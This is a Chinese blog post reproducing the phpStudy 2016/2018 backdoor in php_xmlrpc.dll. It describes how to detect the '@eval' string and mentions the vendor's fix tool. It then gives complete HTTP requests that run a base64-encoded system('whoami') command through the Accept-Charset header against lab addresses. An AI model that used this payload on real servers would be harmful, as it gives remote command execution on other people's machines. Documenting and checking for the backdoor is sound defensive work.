介绍
phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。
- 软件作者声明:phpstudy 2016版PHP5.4存在后门。
- 实际测试官网下载phpstudy2018版php-5.2.17和php-5.4.45也同样存在后门
据传漏洞形成原因是官网被入侵后植入后门,嫌疑人已被抓。
咱也不敢说咱也不敢问
是个古老的问题了,我也不知道为什么今天出来水了一篇。。。
手动检查
后门代码存在于\ext\php_xmlrpc.dll
模块中,phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45
phpStudy2016路径
php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll
phpStudy2018路径
PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll
PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dl
用记事本打开此文件查找@eval
,文件存在@eval(%s(‘%s’))
证明漏洞存在
工具检查并修复
官方发布了:phpstudy 安全自检修复程序,可用于2016 2018版本的安全检测与修复,下载该文件一键检查与修复。
浏览器访问靶机地址:http://192.168.1.91/
浏览器设置本地代理并且打开BurpSuiteFree抓包
POC:
GET / HTTP/1.1
Host: 192.168.43.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64;x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Accept-Charset:”commandbase64 string”
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
CTRL + R把请求包转发到中继器模块
Accept-Charset:”command base64 string”中执行命令经过了的的Base64编码加密:
执行语句指令:system(‘whoami’);
BASE64 编码后:c3lzdGVtKCd3aG9hbWknKTs =
替换进去
Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
还要把“ ”中的前面的空格删除。Accept-Encoding: gzip, deflatedeflate
(6)构造好执行语句为WHOAMI的POC如下:
GET / HTTP/1.1
Host: 192.168.1.91
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64;rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip,deflate
Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
聪明的你应该知道要干嘛了。
咳咳咳,不过还是别干坏事,自己玩玩就好了。
评论 (0)